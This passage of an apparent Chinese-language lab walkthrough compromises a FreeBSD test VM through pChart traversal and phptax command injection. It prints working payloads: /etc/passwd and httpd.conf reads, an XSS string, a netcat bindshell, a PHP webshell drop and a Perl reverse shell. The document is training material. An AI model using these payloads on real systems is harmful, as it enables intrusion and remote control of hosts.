)\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\nOutput File: \/home\/kali\/reports\/http_192.168.244.144\/__24-01-29_02-01-23.txt\nTarget: http:\/\/192.168.244.144\/\n\n[02:01:23] Starting: \n[02:02:03] 500 -  535B  - \/cgi-bin\/printenv                                  \n[02:02:04] 500 -  535B  - \/cgi-bin\/test-cgi                                  \n\nTask Completed<\/code><\/pre>\n<p>\u4ee5\u9632\u4e07\u4e00\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>dirb<\/code>\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-shell\">dirb http:\/\/192.168.244.144\/\n# -----------------\n# DIRB v2.22    \n# By The Dark Raver\n# -----------------\n# START_TIME: Mon Jan 29 02:07:43 2024\n# URL_BASE: http:\/\/192.168.244.144\/\n# WORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n# -----------------\n# GENERATED WORDS: 4612                                                          \n# ---- Scanning URL: http:\/\/192.168.244.144\/ ----\n# + http:\/\/192.168.244.144\/cgi-bin\/ (CODE:403|SIZE:210)                                       \n# + http:\/\/192.168.244.144\/index.html (CODE:200|SIZE:152)                                                                     \n# -----------------\n# END_TIME: Mon Jan 29 02:08:09 2024\n# DOWNLOADED: 4612 - FOUND: 2<\/code><\/pre>\n<h2>\u5bfb\u627e\u6f0f\u6d1e<\/h2>\n<p>\u521a\u521a\u518d\u6e90\u4ee3\u7801\u91cc\u627e\u5230\u4e86\u4e00\u4e2a\u914d\u7f6e\u7684\u7248\u672c\u53f7\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217169.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217169.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129160256578\" \/><\/div><\/p>\n<p>\u6b63\u597d\u7248\u672c\u548c\u6211\u4eec\u7684\u7248\u672c\u4e00\u81f4\uff0c\u6211\u4eec\u770b\u4e00\u4e0b\u6f0f\u6d1e\u662f\u5565\u6837\u7684\uff1a<\/p>\n<pre><code class=\"language-text\"># Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS\n# Date: 2014-01-24\n# Exploit Author: Balazs Makany\n# Vendor Homepage: www.pchart.net\n# Software Link: www.pchart.net\/download\n# Google Dork: intitle:&quot;pChart 2.x - examples&quot; intext:&quot;2.1.3&quot;\n# Version: 2.1.3\n# Tested on: N\/A (Web Application. Tested on FreeBSD and Apache)\n# CVE : N\/A\n\n[0] Summary:\nPHP library pChart 2.1.3 (and possibly previous versions) by default\ncontains an examples folder, where the application is vulnerable to\nDirectory Traversal and Cross-Site Scripting (XSS).\nIt is plausible that custom built production code contains similar\nproblems if the usage of the library was copied from the examples.\nThe exploit author engaged the vendor before publicly disclosing the\nvulnerability and consequently the vendor released an official fix\nbefore the vulnerability was published.\n\n[1] Directory Traversal:\n&quot;hxxp:\/\/localhost\/examples\/index.php?Action=View&amp;Script=%2f..%2f..%2fetc\/passwd&quot;\nThe traversal is executed with the web server&#039;s privilege and leads to\nsensitive file disclosure (passwd, siteconf.inc.php or similar),\naccess to source codes, hardcoded passwords or other high impact\nconsequences, depending on the web server&#039;s configuration.\nThis problem may exists in the production code if the example code was\ncopied into the production environment.\n\nDirectory Traversal remediation:\n1) Update to the latest version of the software.\n2) Remove public access to the examples folder where applicable.\n3) Use a Web Application Firewall or similar technology to filter\nmalicious input attempts.\n\n[2] Cross-Site Scripting (XSS):\n&quot;hxxp:\/\/localhost\/examples\/sandbox\/script\/session.php?&lt;script&gt;alert(&#039;XSS&#039;)&lt;\/script&gt;\nThis file uses multiple variables throughout the session, and most of\nthem are vulnerable to XSS attacks. Certain parameters are persistent\nthroughout the session and therefore persists until the user session\nis active. The parameters are unfiltered.\n\nCross-Site Scripting remediation:\n1) Update to the latest version of the software.\n2) Remove public access to the examples folder where applicable.\n3) Use a Web Application Firewall or similar technology to filter\nmalicious input attempts.\n\n[3] Disclosure timeline:\n2014 January 16 - Vulnerability confirmed, vendor contacted\n2014 January 17 - Vendor replied, responsible disclosure was orchestrated\n2014 January 24 - Vendor was inquired about progress, vendor replied\nand noted that the official patch is released.<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528(\u672a\u5229\u7528\u6210\u529f)<\/h2>\n<p>\u53ef\u4ee5\u770b\u5230\u662f\u4e00\u4e2a\u76ee\u5f55\u904d\u5386\/\u6587\u4ef6\u6cc4\u9732\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\u4e00\u4e0b\uff0c\u4f46\u662f\u53d1\u73b0\u65e0\u6cd5\u76f4\u63a5\u5229\u7528\uff0c\u6ca1\u6709\u53d1\u73b0php\u6587\u4ef6\uff0c\u91cd\u65b0\u56de\u987e\u4e00\u4e0b\uff0c\u53ef\u4ee5\u770b\u5230\u4e4b\u524d\u7684<code>pchart<\/code>\u6709\u4e2a\u76ee\u5f55\uff0c\u641c\u7d22\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8bbf\u95ee\u76f8\u5173\u76ee\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217170.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217170.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161058040\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7adf\u7136\u53ef\u4ee5\u8fdb\u884c\u8bbf\u95ee\uff0c\u723d\u6b7b\u4e86\uff01\u627e\u4e00\u4e0bphp\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217171.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217171.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161324139\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-css\">http:\/\/192.168.244.144\/pChart2.1.3\/examples\/sandbox\/script\/session.php?%3Cscript%3Ealert(%27XSS%27)%3C\/script%3E<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217172.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217172.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\u7684\uff0c\u5c1d\u8bd5\u8bfb\u53d6\u76f8\u5173\u76ee\u5f55\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-css\">http:\/\/192.168.244.144\/pChart2.1.3\/examples\/index.php?Action=View&amp;Script=%2f..%2f..%2fetc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217173.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217173.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161654877\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u6de1\u7cfb\u7edf\u7248\u672c\u4e3a<code>FreeBSD 9.0<\/code>\uff0c\u5c1d\u8bd5\u641c\u7d22\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217174.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217174.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161927669\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e24\u4e2a\u6743\u9650\u63d0\u793a\u7684\u6f0f\u6d1e\uff0c\u770b\u6765\u5f97\u4ece\u522b\u7684\u5730\u65b9\u7740\u624b\u5148\u83b7\u53d6\u4e00\u4e2a\u666e\u901a\u7528\u6237\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0bApache\u670d\u52a1\u5668\u76f8\u5173\u914d\u7f6e\u6587\u4ef6\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u62ff\u5230\u654f\u611f\u6570\u636e\u3002\u641c\u7d22\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217175.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217175.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129162501746\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217176.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217176.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129162729726\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217177.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217177.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129163101271\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.144\/pChart2.1.3\/examples\/index.php?Action=View&amp;Script=%2f..%2f..%2fusr\/local\/etc\/apache22\/httpd.conf<\/code><\/pre>\n<p>\u53ef\u770b\u5230\u4e4b\u524d\u6ca1\u6709\u626b\u6210\u529f\u4e5f\u662f\u5f88\u6b63\u5e38\u7684\uff0capache\u914d\u7f6e\u4e86\u62d2\u7edd\u8fde\u63a5\u4e86\uff0c\u6211\u4eec\u67e5\u770b\u4ee5\u540e\u53d1\u73b0apache\u670d\u52a1\u5668\u5bf9\u4e8e\u8bbf\u95ee\u8bf7\u6c42\u5934\u6709\u8981\u6c42\uff0c\u5fc5\u987b\u4e3a<code>8080\u7aef\u53e3\u5141\u8bb8\u7684User-Agent\u4e3a\uff1aMozilla\/4.0 Mozilla4_browser<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217178.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217178.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129171645499\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f7f\u7528\u63d2\u4ef6\u4fee\u6539\u8bf7\u6c42\u5934\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<p>\u8fd9\u91cc\u6211\u4f7f\u7528\u7684\u662f\uff1a<code>HackBar V2 by chewbaka<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217179.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217179.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129164409226\" \/><\/div><\/p>\n<p>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217180.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217180.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129164600866\" \/><\/div><\/p>\n<p>\u5230\u5904\u70b9\u4e00\u4e0b\uff0c\u6ca1\u6709\u5565\u6536\u83b7\uff0c\u641c\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217181.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217181.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129172340948\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u597d\u5bb6\u4f19\uff0c\u8fd9\u53ef\u4e0d\u662f\u6211\u60f3\u641c\u5230\u7684\u55f7\uff0c\u6211\u4eec\u76f4\u63a5\u5229\u7528\u4e00\u4e0b\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217182.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217182.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129172744914\" \/><\/div><\/p>\n<pre><code class=\"language-shell\">-----------------------------------------------------\nphptax 0.8 &lt;= Remote Code Execution Vulnerability\n-----------------------------------------------------\nDiscovered by: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;\nVendor information:\n&quot;PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.\nThe program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot.&quot;\nVendor URI: http:\/\/sourceforge.net\/projects\/phptax\/\n----------------------------------------------------\nRisk-level: High\nThe application is prone to a remote code execution vulnerability.\n----------------------------------------------------\ndrawimage.php, line 63:\ninclude (&quot;.\/files\/$_GET[pfilez]&quot;);\n\/\/ makes a png image\n$pfilef=str_replace(&quot;.tob&quot;,&quot;.png&quot;,$_GET[pfilez]);\n$pfilep=str_replace(&quot;.tob&quot;,&quot;.pdf&quot;,$_GET[pfilez]);\nHeader(&quot;Content-type: image\/png&quot;);\nif ($_GET[pdf] == &quot;&quot;) Imagepng($image);\nif ($_GET[pdf] == &quot;make&quot;) Imagepng($image,&quot;.\/data\/pdf\/$pfilef&quot;);\nif ($_GET[pdf] == &quot;make&quot;) exec(&quot;convert .\/data\/pdf\/$pfilef .\/data\/pdf\/$pfilep&quot;);\n----------------------------------------------------\nExploit \/ Proof of Concept:\nBindshell on port 23235 using netcat:\nhttp:\/\/localhost\/phptax\/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20\/bin\/bash;&pdf=make\n** Exploit-DB Verified:**\nhttp:\/\/localhost\/phptax\/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20\/bin\/bash;&pdf=make\n----------------------------------------------------\nSolution:\nDo some input validation.\n----------------------------------------------------    <\/code><\/pre>\n<p>\u5c1d\u8bd5\u5229\u7528\uff0c\u5c1d\u8bd5\u4f20\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\u4e0a\u53bb\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.144:8080\/phptax\/index.php?pfilez=xxx;echo%20%22%3C%3Fphp%20system(\\$_GET[&#039;hack&#039;]); %3F%3E%22%20&gt;%20shell.php;&amp;pdf=make\n# http:\/\/192.168.244.144:8080\/phptax\/index.php?pfilez=xxx;echo &quot;&lt;?php system(\\$_GET[&#039;hack&#039;]); ?&gt;&quot; &gt; shell.php;&amp;pdf=make<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217183.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217183.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129182939902\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fde\u63a5\uff0c\u5931\u8d25\uff0c\u67e5\u770b<a href=\"https:\/\/blog.csdn.net\/qq_32261191\/article\/details\/118895081\">\u5927\u4f6c\u7684blog<\/a>\uff0c\u53d1\u73b0\u662f\u8981\u901a\u8fc7perl\u811a\u672c\u6765\u53cd\u5f39shell\uff0c\u8fd9\u4e00\u5757\u8fd8\u662f\u4e0d\u592a\u4f1a\uff0c\u56de\u5934\u5355\u72ec\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-perl\"># Server\n\/phptax\/drawimage.php?pfilez=xxx;perl -e &#039;use Socket;$i=&quot;192.168.244.144&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};&#039;&amp;pdf=make\n# Client\nnc -lvp 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217184.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217184.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129184847428\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0IP\u4e0d\u5c0f\u5fc3\u586b\u6210\u9776\u573aIP\u4e86\uff0c\u4e00\u76f4\u8fde\u4e0d\u4e0a\u3002\u3002\u3002\u3002\u91cd\u65b0\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper 